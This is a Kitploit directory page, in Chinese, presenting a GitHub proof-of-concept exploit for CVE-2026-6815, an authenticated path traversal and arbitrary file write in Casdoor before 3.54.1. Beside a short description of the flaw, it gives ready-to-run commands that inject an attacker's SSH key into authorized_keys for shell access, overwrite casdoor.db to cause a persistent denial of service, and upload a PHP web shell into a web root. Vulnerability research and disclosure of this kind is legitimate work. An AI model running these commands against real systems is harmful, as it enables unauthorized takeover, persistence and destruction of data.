Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-6815 — 针对Casdoor <3.54.1的经过身份验证的路径遍历和任意文件写入PoC漏洞利用,通过SSH密钥注入、Web shell上传或数据库损坏实现RCE或持久DoS。 | Kitploit
工具/GitHubGitHub/danilo-dellorco/cve-2026-6815
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubdanilo-dellorco/cve-2026-6815

CVE-2026-6815

针对Casdoor <3.54.1的经过身份验证的路径遍历和任意文件写入PoC漏洞利用,通过SSH密钥注入、Web shell上传或数据库损坏实现RCE或持久DoS。

查看仓库
222个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-6815 PoC/Exploit:Casdoor <3.54.1 路径遍历与任意文件写入(已认证)

本仓库包含针对 CVE-2026-6815 的概念验证(PoC)利用代码,该漏洞是 Casdoor 中的一个任意文件写入与路径遍历漏洞。

该漏洞已在 3.54.1 版本中被 修复。

前提条件

攻击者必须通过管理员权限或同等权限的用户账户认证到 Casdoor 实例,且该账户具有创建和/或编辑存储提供商的权限。

影响

  • 远程代码执行(RCE):通过写入敏感位置,如 .ssh/authorized_keys、crontab 或 Web 根目录。
  • 拒绝服务(DoS):用任意文件覆盖应用程序数据库(casdoor.db)或核心二进制文件,可立即停止应用程序运行。

技术细节

Casdoor 允许管理员配置存储提供商。本地文件系统(Local File System)提供商在资源上传期间未能正确清理 pathPrefix 配置和 fullFilePath 参数。

通过使用目录遍历序列(../),已认证的管理员可以逃逸专用存储目录,并在 Casdoor 进程具有权限的任何位置写入文件。

该漏洞源于以下位置中路径验证不充分:

  • object/provider.go:在创建/更新期间未对 pathPrefix 进行验证。
  • storage/local_file_system.go:GetFullPath 方法未验证解析后的路径是否仍位于预期的沙箱之内。

使用方法

  1. 安装依赖:

    root@kitploit:~
    pip install -r requirements.txt
    
  2. 运行利用代码:

    root@kitploit:~
    python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
    

使用示例

1. SSH 密钥注入实现 RCE

将攻击者控制的公钥写入 casdoor 用户的 authorized_keys 文件,以获得 SSH 访问权限。

生成 SSH 密钥:

root@kitploit:~
ssh-keygen -f casdoor_rce

用生成的公钥覆盖 authorized_keys:

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file casdoor_rce.pub --rpath /home/casdoor/.ssh/authorized_keys

使用私钥在远程主机上获取 SSH shell:

root@kitploit:~
ssh -i ./casdoor_rce casdoor@target

2. 持久性 DoS(数据库损坏)

覆盖应用程序的本地数据库文件(例如 casdoor.db)以造成拒绝服务。

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. Web Shell 上传(辅助 Web 根目录)

如果服务器在同一文件系统上托管辅助 Web 服务器(例如 Apache/Nginx),则可将 Web Shell 写入其文档根目录。

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

4. 自定义组织与应用程序

如果您拥有特定组织和应用程序(而非默认的 built-in 和 app-built-in)的管理员凭据,请使用 --orgname 和 --appname 指定它们。

root@kitploit:~
python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt

参考链接

  • CERT/CC 漏洞公告 VU#937808
  • CVE-2026-6815 在 CVE.org 上
  • Red Hat 安全通告:CVE-2026-6815

免责声明

本软件仅用于教育目的和授权的安全测试。作者不对任何滥用此信息的行为负责。

作者

漏洞发现及 PoC 开发:Danilo Dell'Orco(sixpain)。

下载工具